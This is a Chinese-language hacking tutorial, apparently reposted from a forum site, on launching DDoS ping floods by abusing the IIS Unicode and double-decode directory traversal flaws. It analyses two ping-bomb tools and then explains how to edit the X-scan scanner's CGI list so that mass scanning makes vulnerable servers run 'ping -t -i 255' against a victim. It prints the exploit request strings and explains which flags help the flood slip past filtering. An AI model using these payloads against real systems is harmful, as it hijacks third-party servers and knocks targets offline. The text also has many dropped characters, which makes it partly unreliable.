ddosping:利用X-scan实现DDoS Ping攻击

来源:http://www.juntuan.net

、从这里说起、、

开始时候不能不说说两款影响力很大DDoS Ping炸弹工具

个是蜗牛炸弹个是AhBomb

蜗牛炸弹出来很早通过实现搜索有漏洞服务器做好储备呵呵需要时候通过

控制这些有漏洞服务器集中 Ping 攻击目标机导致目标网络速度变慢达到DDoS攻击

AhBomb是bigball写款更强大攻击工具(呵呵这里很感谢他送给我无限制版)
[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/1.g[/IMGA]
从本质上说AhBomb实现思路方法和蜗牛炸弹没有什么区别但是由于编写很优秀多线程

部分写特别完善而且缺省参数导致很可能会对被攻击者带来致命打击

呵呵

还是分析下吧:

首先从蜗牛炸弹开始谈起

它有个搜索过程搜索unicode漏洞主机然后将主机地址保存在Server.dll文件中

在需要实施攻击时候就调动所有服务器进行攻击

我对个虚拟目标 200.200.200.200 这个ip进行攻击却省配置下截获数据包:
[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/2.g[/IMGA]
前面部分

Get /scripts/..%c1%1c../winnt/system32/cmd.exe?/c

是通过unicode编码Windows服务器命令解释器去执行命令

具体被执行命令是:

ping -l 65000 -n 500 200.200.200.200

这里解释如下:

ping 个发送测试数据包检测网络状况命令

-l 64000 发送包含由64000字节数据量 ECHO 数据包

-n 500 发送500遍 ECHO 请求数据包

200.200.200.200 目标ip呵呵

现在看很清楚了吧也不用多说

 

这些命令虽然简单但由于ping命令使用只需要最低限度用户权限而具有unicode漏洞

机器又非常多这才会导致大量数据涌向于是、、挂了

 

 

我们来看看AhBomb做了些什么
[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/3.g[/IMGA]
前面部分

Get /scripts/..%%255c..%255cwinnt/system32/cmd.exe?/c

是通过unicode编码Windows服务器命令解释器去执行命令比较新编码所以找到

漏洞服务器应该会更多

具体被执行命令是:

ping 192.168.0.1 -t -i 255

这里解释如下:

ping 个发送测试数据包检测网络状况命令

-t 不停发送 ECHO 数据包不停

-i 255 TTL值设为255(最大)

192.168.0.1 目标呵呵

 

仔细看看它参数和蜗牛炸弹区别具体体现在它并没有发送大数据包而仅仅是发送

普通大小很多网络设备会过滤大包标准格式反而才能真正被发送到目标

 

这里附:(TTL:生存时间指定数据报被路由器丢弃的前允许通过网段数量TTL 是由发送主机

设置以防止数据包不断在 IP 互联网络上永不终止地循环转发 IP 数据包时要求路由器

至少将 TTL 减小 1 )

 

 

2、款经典扫描工具X-scan

X-scan安全焦点力作开始构想到现在全开放式结构设计这种执著精神

难道不正是我们所追求么?、、、

重点从它cgi扫描功能谈起

选中Tools中CGI列表维护功能可以看到其中列出了从Windows到各个版本Unix系统

可能存在cgi漏洞列表

[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/4.g[/IMGA]
它是如何验证服务器是否存在漏洞?

命令解释器执行 dir 命令!

换你思维模式个hacker思维模式去想

dir 命令可以我们为什么不能其他命令呢?

呵呵

这就是我要说重点了

如果我把

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir

替换成

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+192.168.0.1

、、、

ping -t -i 255 -w 5 192.168.0.1

为什么用这个命令?

为了不被网络设备过滤掉所以不发送大数据包

为了能够让我们数据包达到目标我们设置TTL值为255

-w 5 参数指定超时间隔为5毫秒不管对方返回信息是什么不停呵呵这对些过滤ICMP包

服务器还是很管用

我打开cgi.lst文件手工编辑其中内容

经过测试目前打了SP2以后仍然会有编码漏洞就是 IIS-DECODE 2次编码漏洞了

我保留了两个最有可能方式库整理如下:

测试目标ip为:192.168.0.1

[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/5.g[/IMGA]
打开Tools中CGI列表维护选择新修改后列表
[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/6.g[/IMGA]
到这里我们只要通过X-scan去大规模扫描cgi漏洞就可以实施对目标服务器DDoS Ping攻击了

到最后罗嗦其实用任何个平台下cgi扫描工具稍作修改都可以实现我们

用X-scan做讲解是出色以及它在扫描cgi漏洞时候是支持代理服务器连接



  • 篇文章: GHOST V8.0 使用详解

  • 篇文章: 内幕惊曝:QQ2005初体验
  • Tags:  ddos攻击软件 ddos攻击器 ddos攻击 ddosping

    延伸阅读

    最新评论

    发表评论